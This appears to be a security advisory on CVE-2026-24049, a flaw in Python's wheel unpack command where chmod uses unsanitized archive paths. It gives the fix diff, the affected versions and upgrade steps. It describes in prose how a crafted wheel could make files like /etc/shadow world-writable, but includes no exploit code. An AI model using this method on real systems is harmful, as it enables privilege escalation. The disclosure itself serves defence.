Wheel of Misfortune: Arbitrary File Permission Modification in Python's Wheel
Vulnerability ID: CVE-2026-24049
CVSS Score: 7.1
Published: 2026-01-22
A critical logic flaw in the wheel packaging tool allows attackers to modify file permissions on the host system via path traversal, potentially leading to privilege escalation.
TL;DR
The wheel unpack command contains a vulnerability where it sanitizes file paths during extraction but uses the raw, unsanitized filename when applying file permissions (chmod). An attacker can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (like /etc/shadow or SSH keys) to be world-writable, leading to total system compromise.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-22 & CWE-732
- Attack Vector: Local (User-Assisted)
- CVSS v3.1: 7.1 (High)
- Impact: Integrity & Availability
- Exploit Status: PoC Available
- Platform: Python (Cross-Platform)
Affected Systems
- Linux workstations using
wheelCLI - CI/CD pipelines processing untrusted Python packages
- Developer environments
-
wheel: <= 0.46.1 (Fixed in:
0.46.2)
Code Analysis
Commit: 7a7d2de
Fix for CVE-2026-24049: use extracted path for chmod
- destination.joinpath(zinfo.filename).chmod(permissions)
+ Path(wf.extract(zinfo, destination)).chmod(permissions)
Exploit Details
- GitHub: Regression test in official repository demonstrating the flaw
Mitigation Strategies
- Update
wheelpackage to version 0.46.2 or later. - Avoid running package inspection tools as root/sudo.
- Implement file integrity monitoring (FIM) on critical system configuration files.
Remediation Steps:
- Identify systems with
wheelinstalled:pip list | grep wheel - Upgrade the package:
pip install --upgrade wheel - Verify the version:
wheel versionshould return 0.46.2+
References
Read the full report for CVE-2026-24049 on our website for more details including interactive diagrams and full exploit analysis.
Top comments (0)